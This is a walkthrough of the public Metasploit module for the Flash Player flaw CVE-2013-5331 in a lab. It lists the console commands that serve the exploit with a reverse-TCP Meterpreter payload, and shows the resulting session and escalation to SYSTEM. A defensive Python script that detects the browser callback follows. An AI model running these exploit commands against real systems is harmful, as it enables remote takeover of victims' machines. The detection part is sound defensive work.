Metasploit CVE-2013-5331 Demo

Description:
This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170.

References:
http://helpx.adobe.com/security/products/flash-player/apsb13-28.html
http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html

*Commands are bold.

use exploit/windows/browser/adobe_flash_filters_type_confusion
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH 2013-5331
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit
[*] Exploit running as background job.
msf exploit(adobe_flash_filters_type_confusion) >
[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2013-5331
[*] Server started.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Gathering target information.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending response HTML.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Request: /2013-5331/GzqJRB/
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending HTML...
[*] 192.168.2.25 adobe_flash_filters_type_confusion - showme the money
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Request: /2013-5331/GzqJRB/jUBO.swf
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending SWF...
[*] Sending stage (769536 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:1096) at 2014-04-30 20:03:46 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:1096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2392)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2888
[+] Successfully migrated to process
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
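
A defender's view of the session above, as an added example that is not part of the original post: it correlates the events the transcript makes observable on the client (the browser fetches content from an address, the same browser process then connects to that address on a non-web port, and notepad.exe appears shortly after). The event schema and sample records are constructed, and treating iexplore.exe as the parent of the spawned notepad.exe is an assumption.

```python
from datetime import datetime, timedelta

BROWSERS = {"iexplore.exe"}
WEB_PORTS = {80, 443, 8080}
# notepad.exe is what the transcript's 'migrate -f' script spawned; the others are assumptions.
UNEXPECTED_CHILDREN = {"notepad.exe", "cmd.exe", "powershell.exe"}

# Constructed telemetry in a hypothetical schema; addresses and PIDs for VICTIM-PC
# mirror the transcript, the OTHER-PC records are benign filler.
EVENTS = [
    {"ts": "2014-04-30 20:03:44", "type": "net", "host": "VICTIM-PC", "image": "iexplore.exe", "pid": 2392, "dst": "192.168.2.23", "dport": 80},
    {"ts": "2014-04-30 20:03:46", "type": "net", "host": "VICTIM-PC", "image": "iexplore.exe", "pid": 2392, "dst": "192.168.2.23", "dport": 4444},
    {"ts": "2014-04-30 20:03:48", "type": "proc", "host": "VICTIM-PC", "image": "notepad.exe", "pid": 2888, "ppid": 2392},
    {"ts": "2014-04-30 20:05:00", "type": "net", "host": "OTHER-PC", "image": "iexplore.exe", "pid": 1500, "dst": "203.0.113.10", "dport": 443},
    {"ts": "2014-04-30 20:05:05", "type": "proc", "host": "OTHER-PC", "image": "notepad.exe", "pid": 1620, "ppid": 1500},
]

def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%d %H:%M:%S")

def detect(events, window_s=30):
    """Alert when a browser process (1) contacted an address on a web port,
    (2) later connected to the same address on a non-web port, and
    (3) spawned an unexpected child within window_s seconds of step 2."""
    alerts = []
    web_peers = {}   # (host, pid) -> addresses the browser fetched web content from
    callbacks = {}   # (host, pid) -> (time, dst, dport) of the non-web connection
    for e in sorted(events, key=_ts):
        key = (e["host"], e["pid"])
        if e["type"] == "net" and e["image"].lower() in BROWSERS:
            if e["dport"] in WEB_PORTS:
                web_peers.setdefault(key, set()).add(e["dst"])
            elif e["dst"] in web_peers.get(key, ()):
                callbacks[key] = (_ts(e), e["dst"], e["dport"])
        elif e["type"] == "proc" and e["image"].lower() in UNEXPECTED_CHILDREN:
            hit = callbacks.get((e["host"], e["ppid"]))
            # A browser-launched notepad.exe with no preceding callback is not flagged.
            if hit and timedelta(0) <= _ts(e) - hit[0] <= timedelta(seconds=window_s):
                alerts.append({"host": e["host"], "browser_pid": e["ppid"],
                               "child": e["image"], "child_pid": e["pid"],
                               "peer": f"{hit[1]}:{hit[2]}"})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```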